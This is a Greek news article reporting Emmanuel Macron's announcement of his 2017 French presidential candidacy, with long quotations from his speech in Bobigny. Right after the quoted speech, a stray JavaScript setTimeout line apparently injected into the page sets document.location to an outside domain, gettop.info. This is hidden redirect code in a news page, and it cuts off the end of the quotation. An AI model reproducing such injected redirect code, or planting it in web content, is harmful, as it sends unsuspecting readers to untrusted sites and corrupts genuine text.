Την υποψηφιότητά του για την Προεδρία της Γαλλίας ανακοίνωσε ο Μακρόν

0
4

 

Ο πρώην υπουργός Οικονομίας της Γαλλίας Εμανουέλ Μακρόν ανακοίνωσε την υποψηφιότητά του στις προεδρικές εκλογές του 2017.

Kατά τη διάρκεια ομιλίας του στο Μπομπινί, στα προάστια του Παρισιού, o 38χρονος πρώην υπουργός ανακοίνωσε: «Είμαι υποψήφιος για την Προεδρία της Δημοκρατίας με σύνθημα την ελπίδα και στόχο την έξοδο από το (πολιτικό) στάτους κβο για την αντιμετώπιση των προκλήσεων μίας νέας εποχής».

«Η χώρα μας δεν απέτυχε και το γνωρίζει, το αισθάνεται και εκεί γεννιέται το διαζύγιο ανάμεσα σε κυβερνώμενους και κυβερνώντες…Η Γαλλία είναι παγιδευμένη από τους κορπορατισμούς και δεν βρίσκεται πλέον στο ύψος των υποσχέσεών της…Δεν μπορούμε να προτείνουμε απλώς την επιδιόρθωση ή την αναπροσαρμογή του μοντέλου μας…το πολιτικό μας σύστημα είναι παγιδευμένο, δεν κατηγορώ κανέναν, δεν μιλώ για αιρετούς…αλλά οι πολιτικοί μηχανισμοί παραλύουν την ικανότητά μας να προχωρήσουμε προς τα εμπρός, είδα από μέσα την κενότητα του πολιτικού μας συστήματος …αυτό ενισχύει την αποφασιστικότητά μου. Αυτό το σύστημα το αρνούμαι… πιστεύω σε αυτήν την δημοκρατική επανάσταση, αυτήν που ετοιμάσαμε εδώ και μήνες με το «Εμπρός»», είπε κατά την ομιλία του ο Εμανουέλ Μακρόν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here